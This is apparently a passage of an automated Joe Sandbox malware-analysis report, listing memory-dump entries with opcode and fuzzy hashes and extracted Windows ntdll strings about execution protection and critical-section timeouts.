                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                            • Instruction ID: 4e491a0dddf2f02f90c290ab07e156aecc64d066667b0069652013ac9d58d707
                                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                            • Instruction Fuzzy Hash: E0D01236110248EFCB02DF41C890DAB773AFBD8750F108019FD19076108A31ED62DA50
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                            • Instruction ID: b9892fe37de489e03059d1865e4e3429ceb95cea4f3e618e6276017fa4431d7f
                                            • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                            • Instruction Fuzzy Hash: 52C04C75711942CFCF15DB59D294F55B7E4F744740F551890E905CB721E624E811CA10
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                            • Instruction ID: 9970302a4823e39ad6f034f007b41c8172c0f2ac81f24c7623488f2d8ccb28e7
                                            • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                            • Instruction Fuzzy Hash: 1AB01232222645CFC7036720CB40B6832A9BF017C0F0900F06500C9830D6189D10E501
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e29aaeb107930bd0d84c69f12b7345fc945d13b54afde9bed05f64399d8fcb74
                                            • Instruction ID: 4de4c80e6c9c491f0aaed334a1069d98ac0b30054f6c8b70cc970085ddd50d2c
                                            • Opcode Fuzzy Hash: e29aaeb107930bd0d84c69f12b7345fc945d13b54afde9bed05f64399d8fcb74
                                            • Instruction Fuzzy Hash: 5C900231615800129140715848885864045A7E0301B95C011E1824564CCA148A565361
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b9f793e9dcdb2d301db6a187bac25c093dde1fd6c158a999e8c945cd2a6b4708
                                            • Instruction ID: ac6f14ae4ce16b5c775bf15cab51162a1bc9a1761a7ae1da6d438ce60bece2f1
                                            • Opcode Fuzzy Hash: b9f793e9dcdb2d301db6a187bac25c093dde1fd6c158a999e8c945cd2a6b4708
                                            • Instruction Fuzzy Hash: 8F900471711500434140715C4C0C4477045F7F13013D5C115F1D54570CC71CCD55D37D
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: caaeac9f19f1541ad5a9af5914a3752832770eae5fc5f0442ad653240dd1af0c
                                            • Instruction ID: 266001cb1b4649ce1f412bee29aac886cf3a3f1e87fa8ea2d7c7a65e24e3b689
                                            • Opcode Fuzzy Hash: caaeac9f19f1541ad5a9af5914a3752832770eae5fc5f0442ad653240dd1af0c
                                            • Instruction Fuzzy Hash: B690023161540802D15071584418786004597D0301F95C011A1424664DC7558B5577A1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a300e96ddae574620c933d7b43084e3ecbe3fbe9579106bc0e28ec7a52057075
                                            • Instruction ID: ea60c36e6806438b78c988fd6559d97fc72e37282b0cf55b69556116ffd0f687
                                            • Opcode Fuzzy Hash: a300e96ddae574620c933d7b43084e3ecbe3fbe9579106bc0e28ec7a52057075
                                            • Instruction Fuzzy Hash: 8690023121140802D104715848086C6004597D0301F95C011A7424665ED66589917231
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 79be963f6399587bc622d6332d6997162e1aa01c0c12e609428d2eac3d17d403
                                            • Instruction ID: 923c617bd01f33b90072a810efc832f6d8b73f3427f90db90b76b58255baab7c
                                            • Opcode Fuzzy Hash: 79be963f6399587bc622d6332d6997162e1aa01c0c12e609428d2eac3d17d403
                                            • Instruction Fuzzy Hash: 8990023121544842D14071584408A86005597D0305F95C011A14646A4DD6258E55B761
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6f1f504d49eef335ca8d6c407f159d6fb8758e607a779e66cfa073a7241ad528
                                            • Instruction ID: 38604315156122a197636d63fdf6286089548390473bbb65bf4a7d2180844f16
                                            • Opcode Fuzzy Hash: 6f1f504d49eef335ca8d6c407f159d6fb8758e607a779e66cfa073a7241ad528
                                            • Instruction Fuzzy Hash: 379002A1211540924500B2588408B4A454597E0201B95C016E2454570CC52589519235
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ad483936539e048a28000ce53b527164ad37cfe2a7ab1938d1d7e08c5e2dd6e4
                                            • Instruction ID: 5a30e13e8b86698fb00c8a5691fb7c1ca2c2ab874ad4cbbbcb5742a7531851a4
                                            • Opcode Fuzzy Hash: ad483936539e048a28000ce53b527164ad37cfe2a7ab1938d1d7e08c5e2dd6e4
                                            • Instruction Fuzzy Hash: 41900225231400020145B558060854B0485A7D63513D5C015F28165A0CC62189655321
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 684e6fe7e367145c4dcb707165b209bdd6b5033c4051c5a4bc613a70b1a1e873
                                            • Instruction ID: 85482c2d426b135480edc902fa3a4b7b4c0d5ac760099a8024ddcf975c2fc729
                                            • Opcode Fuzzy Hash: 684e6fe7e367145c4dcb707165b209bdd6b5033c4051c5a4bc613a70b1a1e873
                                            • Instruction Fuzzy Hash: AB90022121544442D1007558540CA46004597D0205F95D011A24645A5DC6358951A231
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4f1223f7ce987314c915f8ee4ce00263abe91183c9a125f5bda4d4313b2dbf31
                                            • Instruction ID: c7543f24ce6aff60336eebc546bf2774cc01228e200c2cd3fabcf042c844a28f
                                            • Opcode Fuzzy Hash: 4f1223f7ce987314c915f8ee4ce00263abe91183c9a125f5bda4d4313b2dbf31
                                            • Instruction Fuzzy Hash: 4C90023125140402D141715844086460049A7D0241FD5C012A1824564EC6558B56AB61
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0663d5dec119e6b267317fb69e5dd0a2cb26fd3e8b0ed79c10c49514e9a07f78
                                            • Instruction ID: a26a43a9d5307050b2b2dd7b250a888de8d64f498053b8c2cb9fe470ccac717e
                                            • Opcode Fuzzy Hash: 0663d5dec119e6b267317fb69e5dd0a2cb26fd3e8b0ed79c10c49514e9a07f78
                                            • Instruction Fuzzy Hash: 6390023121140842D10071584408B86004597E0301F95C016A1524664DC615C9517621
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 137884038ffec52ebbdcc47ab66581607b40741eacf4916e0ea50002b5ffd7d5
                                            • Instruction ID: 13fa5ec95ccaaa16a6c18b035f9f36c3b2309e3ca5946ed45178beb2e68df1d4
                                            • Opcode Fuzzy Hash: 137884038ffec52ebbdcc47ab66581607b40741eacf4916e0ea50002b5ffd7d5
                                            • Instruction Fuzzy Hash: 5D90043131140403D100715C550C7470045D7D0301FD5D411F1C3457CDD757CD517331
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6ee420bddcf4837ad46b12714e872255af9e112207c9f630eaeb9b2a42a4cf39
                                            • Instruction ID: 4ad7d17deeae9802f7618a1656b88f583cc5e123f64fe4e98e7ffa49a8a2eb06
                                            • Opcode Fuzzy Hash: 6ee420bddcf4837ad46b12714e872255af9e112207c9f630eaeb9b2a42a4cf39
                                            • Instruction Fuzzy Hash: A390043171540403D140715C541C7470055D7D0301FD5D011F1434574DC75DCF5577F1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4f12fd0458c6e2a4f443907a0a2a473a41a21a4bdd8b0497006a419e406ae816
                                            • Instruction ID: 1a0a00816a2fceca28e11d7eac75a541b7c5b8991c4298c810c5bc1849bd50d0
                                            • Opcode Fuzzy Hash: 4f12fd0458c6e2a4f443907a0a2a473a41a21a4bdd8b0497006a419e406ae816
                                            • Instruction Fuzzy Hash: 5390026122140042D10471584408746008597E1201F95C012A3554564CC5298D615225
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 75492089099b184da42361f5896a75ba555b504ae114e57453d6ed888ab141ea
                                            • Instruction ID: 90b5eb2201d137347cbc4aa280b38b48121367adc76d1457d3b1e55cdb5e0156
                                            • Opcode Fuzzy Hash: 75492089099b184da42361f5896a75ba555b504ae114e57453d6ed888ab141ea
                                            • Instruction Fuzzy Hash: EE90023121180402D1007158480C787004597D0302F95C011A6564565EC665C9916631
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c69e00f496176f2201e6cdacb51f7ac1355fabf66b131d6e580cb7595e839540
                                            • Instruction ID: daed1319bde36760a60424e9c4fb36b670b50ca63a8e5476952c0875a63bc4a1
                                            • Opcode Fuzzy Hash: c69e00f496176f2201e6cdacb51f7ac1355fabf66b131d6e580cb7595e839540
                                            • Instruction Fuzzy Hash: 2890022131140402D102715844186460049D7D1345FD5C012E2824565DC6258A53A232
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1c2febdba192928181fe09537563f9a62fa21629804078e498663d79aaba4b4b
                                            • Instruction ID: 93fbf831af93c194ec40f689f7a5714506ed36e1c5c5897b018470a9356e5d9c
                                            • Opcode Fuzzy Hash: 1c2febdba192928181fe09537563f9a62fa21629804078e498663d79aaba4b4b
                                            • Instruction Fuzzy Hash: 7090026121180403D14075584808647004597D0302F95C011A3464565ECA298D516235
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0f8c8b66f143e039d12d98f79767277122a11d802998e0586fd6e766c34b340d
                                            • Instruction ID: 813c97f7538349f3db19d2058452e543bf6945622dbca072dc9c6dc79c16aba5
                                            • Opcode Fuzzy Hash: 0f8c8b66f143e039d12d98f79767277122a11d802998e0586fd6e766c34b340d
                                            • Instruction Fuzzy Hash: 3D90022121184442D14072584808B4F414597E1202FD5C019A5556564CC91589555721
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a77edab0bbf51bf3008246cbd95a9695d910d769afd2504239c8cf762fc484dc
                                            • Instruction ID: 18e1380f651b16f0d96f01c0bd3d4050bb74d16c453cfa360513c1a17432f8ab
                                            • Opcode Fuzzy Hash: a77edab0bbf51bf3008246cbd95a9695d910d769afd2504239c8cf762fc484dc
                                            • Instruction Fuzzy Hash: AD90022125140802D140715884187470046D7D0601F95C011A1424564DC6168A6567B1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c08c34feca32cca2c69886ae265b36b8d0865c0c4d93b3c6786ecd4ee89e639f
                                            • Instruction ID: 76e9f9290c2410b335a8bd960e433c2ce529729dcb28cfe67dfa6b3ebdb5ece1
                                            • Opcode Fuzzy Hash: c08c34feca32cca2c69886ae265b36b8d0865c0c4d93b3c6786ecd4ee89e639f
                                            • Instruction Fuzzy Hash: 1790023161550402D10071584518746104597D0201FA5C411A1824578DC7958A5166A2
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8978fd59d31daae701b392058071a89c24fb5a13e849a7de7e4a020996a88605
                                            • Instruction ID: 1e875138d45d8b64b328527a228f60476a566d39fddd3897a06ef1f0b559f6d5
                                            • Opcode Fuzzy Hash: 8978fd59d31daae701b392058071a89c24fb5a13e849a7de7e4a020996a88605
                                            • Instruction Fuzzy Hash: CE90043135545103D150715C440C7574045F7F0301FD5C031F1C145F4DC555CD557331
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2cc81b5ed0fae0c6de79e1d72c025354ba30003ecbe696a7593284bbc3285946
                                            • Instruction ID: 522c50956121d1be2e06f11a875a8b332405a4ac2afc5b13c4ff31f66ef16a90
                                            • Opcode Fuzzy Hash: 2cc81b5ed0fae0c6de79e1d72c025354ba30003ecbe696a7593284bbc3285946
                                            • Instruction Fuzzy Hash: BA90023121240142954072585808A8E414597E1302BD5D415A1415564CC91489615321
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1f0fce82e578f021c0e93de22292567e189e44eae4a62945a70e07b2c59f4de
                                            • Instruction ID: 83668aa48c166ef9cb9e744688e74404279ba4786bab43f43973d290da7b33a4
                                            • Opcode Fuzzy Hash: e1f0fce82e578f021c0e93de22292567e189e44eae4a62945a70e07b2c59f4de
                                            • Instruction Fuzzy Hash: 4190023521140402D51071585808686008697D0301F95D411A1824568DC65489A1A221
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction ID: b434f23eadb45d2bbf040cf6e4b428e4045529900500362e4c0dfbdf5ff9bed2
                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: a7700cb3c5357c8eb3cac9546ea2d8753394e3a4478b81c1c86e126aca5ff319
                                            • Instruction ID: c785a4ea86b878151c5ea2a5f78839326f8a69454f8d5154093ea7cbeae54d05
                                            • Opcode Fuzzy Hash: a7700cb3c5357c8eb3cac9546ea2d8753394e3a4478b81c1c86e126aca5ff319
                                            • Instruction Fuzzy Hash: BA51F7B2A24257FFCB21DB9CC89097EFBF8BB082407508129F595D7681D374DE4087A0
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 6f9412a6273180b5f29ec5b4be527f0675f446f40fa2bd199f7326fffcee4812
                                            • Instruction ID: 07ab0feb98f9b99f0cb227d26c943a9f6f839b35ad9bd96c142245d76abb6bc2
                                            • Opcode Fuzzy Hash: 6f9412a6273180b5f29ec5b4be527f0675f446f40fa2bd199f7326fffcee4812
                                            • Instruction Fuzzy Hash: 2851F475A00645AFCB20DE9CD89097FFBF8EF44204B448459F496E7681E6B4EA4087A0
                                            Strings
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01304742
                                            • ExecuteOptions, xrefs: 013046A0
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 013046FC
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01304725
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01304787
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01304655
                                            • Execute=1, xrefs: 01304713
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: d236fb4c0fe76bed77718426412d83fa34f0679099ad7db911693281eecc3914
                                            • Instruction ID: 44361c348cc5c12825290d652f0f033abdf4c31ccada487432e77ba626a37b31
                                            • Opcode Fuzzy Hash: d236fb4c0fe76bed77718426412d83fa34f0679099ad7db911693281eecc3914
                                            • Instruction Fuzzy Hash: 6651493162021A6EEF15ABA8DC96FFE77ACEF14B04F14019DD705A7190E7709A458F50
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction ID: 6ec77f9a8248a176242b49740cf832d6493a23c35c911373f31fd0b44621cb7e
                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction Fuzzy Hash: E681D431E2524A9FEF298E6CC8727FEBBB1AF47350F1A4119DA51A72D1C7348840CB51
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 013002BD
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 013002E7
                                            • RTL: Re-Waiting, xrefs: 0130031E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            • Opcode ID: 2f6f1c0b278b55da19f7d2c7e43308c1a9171c1cdbdadc8563a0cfbe0e03ab8f
                                            • Instruction ID: d11d6dc33e63f4e4a1b70da9d78c72fddbdb6cd4854009f19da82e491c3e196b
                                            • Opcode Fuzzy Hash: 2f6f1c0b278b55da19f7d2c7e43308c1a9171c1cdbdadc8563a0cfbe0e03ab8f
                                            • Instruction Fuzzy Hash: 17E1DF30624742DFD72ACF2CC995B6ABBE0BB84398F140A5DF6A58B2D1D774D844CB42
                                            Strings
                                            • RTL: Resource at %p, xrefs: 01307B8E
                                            • RTL: Re-Waiting, xrefs: 01307BAC
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01307B7F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            • Opcode ID: 3d779164e83452bfda8673896a91b4ca061900903dee6ad68b33107a2cbf93b0
                                            • Instruction ID: 025576d3bce7bbc4cdb493fcffc1e6a02e7886926b10287768c2142383d86112
                                            • Opcode Fuzzy Hash: 3d779164e83452bfda8673896a91b4ca061900903dee6ad68b33107a2cbf93b0
                                            • Instruction Fuzzy Hash: 564123353107039FD721DE29CC42B6AB7E5EF88B14F000A1DFA9A97780DB71E8058B91
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0130728C
                                            Strings
                                            • RTL: Resource at %p, xrefs: 013072A3
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01307294
                                            • RTL: Re-Waiting, xrefs: 013072C1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            • Opcode ID: ddfcb57fdc73660ef6ed813a5a0d3c2cee5d8b7d950a0faedf9c14da3f63348a
                                            • Instruction ID: 088dcfc9cbfd9d297c3bd66f2c03822666b0cd35c246876e510600da137722fa
                                            • Opcode Fuzzy Hash: ddfcb57fdc73660ef6ed813a5a0d3c2cee5d8b7d950a0faedf9c14da3f63348a
                                            • Instruction Fuzzy Hash: 27413235710206ABC722CE29CC42F66B7E9FF54B58F10061CFA85AB280DB31F8068BD1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$]:%u
                                            • API String ID: 48624451-3050659472
                                            • Opcode ID: dba4e9a4b8eaeb6c5cc2912a055283b8deec88981eea4709ed36c713c3facf67
                                            • Instruction ID: e54e81d9e0bb9c68fa14bcc5010a3b689dd81261aca61d5f960dd882c97f39d3
                                            • Opcode Fuzzy Hash: dba4e9a4b8eaeb6c5cc2912a055283b8deec88981eea4709ed36c713c3facf67
                                            • Instruction Fuzzy Hash: CD314F72A106199FDB20DF29DC44BEFB7F8EB54614F84455AF949E3240EB30AA458BA0
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
